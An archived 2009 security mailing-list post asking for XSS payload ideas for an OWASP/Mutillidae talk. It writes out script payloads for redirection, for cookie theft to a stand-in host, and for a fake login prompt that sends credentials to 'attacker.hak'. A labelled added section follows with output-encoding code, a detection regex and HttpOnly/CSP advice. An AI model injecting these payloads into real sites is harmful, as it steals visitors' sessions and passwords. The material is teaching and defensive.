PaulDotCom mailing list archives
Cool things to inject via XSS
From: irongeek at irongeek.com (Adrian Crenshaw)
Date: Thu, 28 May 2009 14:50:39 -0400
Ok, I've got yet another presentation coming up, this time on the OWASP Top 10 and Mutillidae. One of the things I'm going to cover is XSS. The canonical example of course is:

<script>alert("XSS");</script>

but that is boring, and gives folks the impression that XSS is not that serious. Better short examples would be:

*Redirect traffic to your site:*

<script>window.location = "http://www.irongeek.com/"</script>

*A little cookie grabbing:*

<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>

*Or maybe a password form to make people think they have to login, but it just grabs the credentials:*

<script>
username=prompt('Please enter your username',' ');
password=prompt('Please enter your password',' ');
document.write("<img src=\"http://attacker.hak/catch.php?username="+username+"&password="+password+"\">");
</script>

What are other cool things to inject, besides maybe BeEF, that show off how XSS can be a big deal?

Thanks,
Adrian
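Every payload in the post only runs because untrusted input reaches the page as markup rather than as text. The following is an added example, not code from Adrian's post or from the Mutillidae project, showing the defender's side: context-aware HTML output encoding that turns the redirect, cookie-grabbing and fake-login shapes above into inert text. The names escapeHtml, renderComment and containsActiveContent are hypothetical, and the sample strings are constructed here to mirror the shapes in the post.

```javascript
// Added example (not from the original post). Output-encode untrusted text
// before it is written into an HTML page, so the browser renders it as text
// instead of parsing it as markup. Runs under Node without dependencies.

// Every character with a meaning in HTML text or attribute context, mapped to
// its entity. Escaping all six covers <script> payloads and attribute break-outs.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

// Hypothetical helper: escape a value for insertion into HTML body or a
// double-quoted attribute.
function escapeHtml(input) {
  return String(input).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Hypothetical server-side template helper: untrusted values only ever reach
// the page through escapeHtml(), never by string concatenation of raw input.
function renderComment(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Self-check (and a crude reflected-input detector for log review): does the
// rendered fragment still contain a construct the browser would execute?
function containsActiveContent(html) {
  return /<script\b|<img\b|\bon\w+\s*=|javascript:/i.test(html);
}

// Constructed sample inputs shaped like the payloads discussed in the post.
const SAMPLE_PAYLOADS = [
  '<script>alert("XSS");</script>',
  '<script>window.location = "http://www.irongeek.com/"</script>',
  '<script>new Image().src="http://some-ip/catch.php?cookie="+encodeURI(document.cookie);</script>',
  '"><img src="http://attacker.hak/catch.php?username=x">',
];

// Render each sample as if it were a user comment and return the safe HTML.
function demo() {
  return SAMPLE_PAYLOADS.map((payload) => renderComment("guest", payload));
}

for (const html of demo()) {
  console.log(containsActiveContent(html) ? "UNSAFE: " : "safe:   ", html);
}
```

Escaping on output is the control that removes the whole class of payloads in the post, regardless of which script is injected. Two further mitigations are worth pairing with it when presenting this: marking the session cookie HttpOnly leaves the cookie-grabbing payload with an empty document.cookie, and a Content-Security-Policy without 'unsafe-inline' stops inline <script> blocks from executing at all.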
Current thread:
- Cool things to inject via XSS Adrian Crenshaw (May 28)
- Cool things to inject via XSS Michael McGrew (May 28)
- Cool things to inject via XSS Jim Halfpenny (May 28)
- Cool things to inject via XSS christopher.riley at r-it.at (May 29)
- Cool things to inject via XSS Michael Douglas (May 29)
- Cool things to inject via XSS packetjack (May 29)
- Cool things to inject via XSS Adrian Crenshaw (May 29)
- Cool things to inject via XSS Robin Wood (May 30)
- Finding the common thread... christopher.riley at r-it.at (Jun 15)
- Finding the common thread... Jim Halfpenny (Jun 15)
- Finding the common thread... christopher.riley at r-it.at (Jun 16)
- Cool things to inject via XSS Michael Douglas (May 29)